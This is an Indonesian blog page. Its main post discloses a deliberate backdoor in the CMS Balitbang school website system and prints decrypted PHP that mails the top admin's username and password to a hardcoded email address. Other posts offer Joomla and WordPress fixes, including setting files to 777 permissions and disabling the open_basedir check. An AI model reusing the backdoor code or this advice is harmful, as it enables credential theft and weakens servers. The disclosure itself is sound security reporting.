Wednesday, 9 July 2014

Pemasangan Backdor secara Sengaja di CMS Balitbang Kemdiknas RI

Tulisan ini di copas dari sundries.mywapblog.com/awas-hati-hati-mrnggunakan-cms-balitbang.xhtml . Terkait dengan benar tidaknya, hanya programmer yang handal yang mengerti, tetapi hal ini menarik untuk programmer agar melakukan penelitian terhadap CMS Balitbang ini

Sundries.mywapblog.com, sekarang ini pengguna CMS dari Balitbang sudah mencapai 111.000, bayangkan saja hampir banyak sekolah di Indonesia membangun website sekolahnya dengan CMS dari Balitbang, termasuk saya sendiri pernah menggunakannya untuk membangun website sekolah. Memang kita harus bangga dengan buah karya anak bangsa dengan adanya CMS Balitbang kita bisa membangun website sekolah dengan mudah dan Instan, tapi dibalik kemudahan itu semua ada kekurangan dari penggunaan CMS Balitbang tersebut selain dari bug - bug yang banyak sekarang ini ada rumor baru mengenai back dor yang dibuat oleh sang programernya, untuk lebih jelasnya anda bisa menyimak artikel dibawah ini.


cms-balitbang-3-5.png
Kali ini kami ingin membongkar skandal perogramer CMS Balitbang yang di gunakan oleh banyak lembaga pendidikan SD,SMP dan SMA/K,  Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga saat ini yang menggunakan sistem tsb berkisar 100 ribu lebih lembaga pendidikan baik SD,SMP dan SMA/K.

Awal cerita rekan kami sebut saja "Mawar" dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.

Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".

Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.

Pembahasan:
1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb "anda bisa cek di google banyak sekali tutor hack sistem tsb" tapi masalah bug ini selesai setelah di rilis versi terbarunya.

2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.

Hal Teknik :
Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.

Kami sebut saja filenya bernama "admin2.php" di letakan di folder "functions"
Kode yg terdapat dalam file tsb sebagai berikut:



Terlhiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng'enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan biggrin itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt

Hasil Decrypt:

=======
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
    $query2="select * from user where userid='$row[userid]' ";
    $alan2=mysql_query($query2) or die ("query gagal");
    $r=mysql_fetch_array($alan2);
    $data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers);
echo "Pesan terkirim";
========

Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi smile perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".

++++++++++++++++++++++++++++

Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.

Kami menyarankan bagi pengguna sistem CMS Balitbang yg melihat artikel ini untuk di kroscek ulang tentang sistem yg anda gunakan mengenai privasi dan keamanan data yg ada di Lembaga pendidikan anda.

Masuk peristiwa awal kami pun menyarakan agar Mawar rekan kami untuk tidak menggunakan sistem CMS Balitbang tsb.

Mungkin Pesan kami buat kawan2 Programer janganlah menjatuhkan harga diri anda sendiri denga hal2 konyol seperti kasus yg kami bahas ini.


++++++++++++++++++++++++++++++++++++
Ada Klarivikasi di komentar dari salah satu anggota tim CMS Balitbang kami masukan di sini :
---------------------------------------- 1 ---
Choirul Anam =>
"Saya baru saja mendapatkan link pembicaraan ini dari seorang kenalan. Saya adalah salah satu anggota team yang ikut andil dlam melahirkan CMS ini. Saya akan klarifikasi. Teman2 mohon tidak langsung menjustifikasi negatif tentang pemasangan backdor tersebut. Ini ada latar belakangnya. Pada awal kelahirannya dulu CMS ini tidak hanya dipakai oleh sekolah, tetapi dipakai juga oleh dunia bisnis, bahkan pemasangannya dibisniskan oleh beberapa pengembang website komersial. Kita tidak menginginkan hal ini terjadi. Maka disepakati pemasangan backdor ini. Intinya back dor tersebut dipasang untuk pengamanan intra, artinya jangan sampai CMS ini digunakan untuk dikomersialkan atau untuk webiste dengan isi negatif. Kita tidak punya mahsud apa2. Tidak akan mengambil keuntungan apapun dari pemasangan back dor tersebut. Dan perlu teman2 ketahui, pembuatan CMS ini bertujuan untuk mempermudah sekolah dalam membuat website, bahkan yang ikut pelatihannya akan memperoleh domain dan hosting gratis. Itu yang dapat saya klarifikasi, semoga ada manfaatnya, terima kasih"
Kami membalas =>
Terimakasih bung atas atensinya klarifikasi hal ini, di sinipun kami juga tidak ingin melakukan pemojokan kepada siapapun. Kami mengharap siapaun yng mengembangkan sebuah sistem opensource untuk juga mengutamakan Privasi dari pengguna sistem tsb. Mungkin ada cara lain yg bisa di lakukan selain membuat privasi pengguna terganggu untuk mennaggulangi kasus comersialisasi tsb. Coba kita ambil contoh terburuk bila sistem terjadi masalah data misal manipulasi negatif, apa bukanya pihak yg menanam backdor malah yg menjadi tujuan Fitnah. Sebelumnya terimkasih atas Klarifikasinya bung akan kami akan masukan di note kami ini."

---------------------------------------- 2 ---
Choirul Anam =>
Sebenarnya masalah backdor itu sudah pernah ada yang memunculkan sekitar 3 tahun yang lalu dari Malang. Dan sudah dibicarakan dengan pihak Balitbang, hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini. Saya mengikuti pengembangannya sampai versi 3.50, dilakukan pada Desember 2012. Versi sesudahnya saya tidak ikut lagi karena kesibukan di sekolah semakin banyak. Untuk usulnya itu, saya akan coba teruskan ke pihak Balitbang. Terima kasih. Saya off dulu yaaa, mau berangkat ronda.

Nama Disamarkan =>
ngutip perkataan abang developernya, "... hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini"

apakah memonitor pengguna cms dengan cara mengirim user + pass admin ke email tertentu? apakah tidak ada cara yang lebih 'terhormat'? saya bersyukur sekali malah, ada cms buatan anak indonesia yang bisa digunakan untuk mempermudah kelancaran proses go onlne sekolah2 di indonesia, tapi saya tidak habis pikir, kenapa bisa hal semacam ini terpikir oleh developer2 handal? ataukah ini memang sengaja di rencanakan / permintaan dari pihak balitbang sendiri? kita sebagai rakyat indonesia yang mendambakan keadilan harus memulai dari hal2 kecil seperti ini, karena kalo hal seperti ini saja tidak bisa diselesaikan, apalagi masalah besar yang lain?
++++++++++++++++++++++++++++++++++++

Salam Hormat untuk Saudaraku semuanya.
===//KOPACI---- ] kopaci.org [ ------========//

*Semoga Bermanfaat
Source
Read More..

Saturday, 7 September 2013

Download Template Wordpress 3 Kolom

http://anathemes.com/freewordpressthemes/3-column/

You can find Free 3 Column Wordpress Themes in this category. Test and download Free 3 Column WP Theme. You can submit your Free 3 Column Wordpress Themes, if you want to.


Read More..

Tuesday, 18 June 2013

Kumpulan Errot - Cara Mengatasi

1.  Warning: include_once
Bila menemukan pesan error berukut ini =  Warning: include_once(/system/koneksi.php) [function.include-once]: failed to open stream: No such file or directory in /home/slfutsa1/public_html/index.php on line 2
Solusi :  pada index.php baris ke 2, hapus tanda / (warna merah)
include_once “/system/koneksi.php”;  diganti  include_once “system/koneksi.php”;

2.  jtablesession::Store Failed DB function failed with error number 145
Solusi : Masuk cpanel, phpmyadmin, klik repair database

3. Could not save data. Error: Could not write to the configuration file
Solusi: Masuk file manager,ubah file configurationsnya ke permission 666

4. An Error has occurred! Unable to open configuration.php file to write!
Sulusi: Masuk ke cpanel>>>>file manager>>>configuration.php set ke permission 777

5. Fatal error: Allowed memory>>>pada WP
Soluis: Buka Cpanel>>public_html,cari file httacces,edit dan tambahkan: "php_value memory_limit 128M" tergantung kebutuhan

6. Error. Unable to upload file.
Solusi:
rubah folder di bawah ini  ke permission 777:
-cache --components -images -language -modules -templates

di publick_html
-cache components -image -language -library -media -modules
-plugins -templates -tmp

7. public_html/wp-includes/pluggable.php on line 881
Solusi: Ganti templatesnya atau rename templates terbaru


8.Warning: mysql_connect() [function.mysql-connect]: Access denied for user
xxxnamadomain8'@'localhost' (using password: YES) in
tmp/cpanel_phpengine.1344137996.147621uSaK7cQOu on line 1617
Access denied for user 'xxxnamadomain'@'localhost' (using password: YES)  "

Solusi:
Ubah password (modify password)
http://cs-21.blogspot.com/2012/06/kumpulan-eror.html
Read More..

Wednesday, 5 June 2013

Mengatasi Check-out failed with the following error: The user checking out does not ...

Check-out failed with the following error: The user checking out does not match the user who checked out the item.  You are not permitted to use that link to directly access that page (#239).

Jika agan berada di bagian modul, centang model yang error seperti diatas. Kemudian klik "Check In "dibagian atas.

when you are in module list please check all with this icon next to name. Then please click 'check-in' from the top menu. It should fix this issue and let's you to edit them.
Read More..

Sunday, 19 May 2013

Cara menghilangkan index.php di URL Joomla! 2.5x

URL default joomla 2.5 selalu membubuhkan index.php di tengah2 antara nama domain, nama categori dan nama halamannya atau judul artikel. So, Artikel berikut akan membahasa cara menghilangkannya index.php supaya URL web joomla 2.5 anda menjadi lebih friendly dan lebih rapi lagi.
Ikuti langkah-langkahnya :
1. Buka administrator dan login --> pilih Site --> Global Configuration, perhatikan menu SEO Setting. Di Search Engine Friendly URLs dan Use URL rewriting klik "Yes", lalu Save, berikut SS nya :
 
2. Buka file manager di CPanel, cari file htaccess.txt, rubah atau rename menjadi .htaccess.
Up's ternyata pada saat merename file terjadi kesalah, warning yang muncul kurang lebih demikian :
"FileOp Failure on: /home/******/public_html/htaccess.txt: 
Destination already exists"
Jangan kuatir, ini dikarenakan ada file di file manager dengan nama .htaccess kapasitas 0kb tapi statusnya di hidden. Sekarang kita musti hapus file tersebut.
3. Buka CPanel ada dari awal lagi, klik File manager akan keluar pop-up "File Manager Directory Selection", pilih opsi "Show Hidden Files (dotfiles)". Berikut SS nya :

4. Dengan demikian file .htaccess yg berkapasitas 0kb akan muncul. Tinggal kita hapus saja file tersebut, lalu rename file htaccess.txt menjadi .htaccess. OK !! Finish, sekarang perhatikan URL web joomla 2.5 anda menjadi lebih frindly dan lebih rapin.

http://www.jditpro.com/sefs/cara-menghilangkan-index-php-di-url-joomla-2-5x
Read More..

Mengatasi Masalah k2 2.6.2 /mod_lofk2tabnews/libs/elements/text.php on line 50

When opening the module in the  backend, i get this where the category selectbox should be:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /XXXXXXX/public_html/modules/mod_lofk2tabnews/libs/elements/text.php on line 50

Is there a fix for this ?

Greetz, Rick


Please try to do as following to resolve the issue:
- Open the file "text.php" in the folder "modules/mod_lofk2tabnews/libs/elements/", then find code:

Code:


return '<input type="text" name="'.$this->name.'" id="'.$this->id.'"' .
retplace to:

Code:


$this->value = is_array($this->value)?implode(",", $this->value):$this->value;

return '<input type="text" name="'.$this->name.'" id="'.$this->id.'"' .

http://www.landofcoder.com/supports/rss-feed.html?option=com_agora&task=topic&id=2338&Itemid=73
Read More..

Mengatasi Solusi JFolder::create: Path not in open_basedir paths

Solusi JFolder::create: Path not in open_basedir paths


Rese'! Saya sempet kesel waktu mau instal template. Berharap bisa liat template baru yg keren, eee malah gagal n muncul tulisan kaya di atas. Buat temen2 yang nemuin kasus sama seperti saya, langsung saja ini solusinya.
Cari file /FolderWebAnda_root/libraries/joomla/filesystem/folder.php
cari baris :
$obd = ini_get ('open_basedir');
kasih komen di depannya, jadi hasilnya :
#$obd = ini_get ('open_basedir');
dan....
Jeng2!! template berhasil d upload.
Thx alot to mr bule yg ud kasi saya solusi.
 
http://cahdb.blogspot.com/2009/11/solusi-jfoldercreate-path-not-in.html
Read More..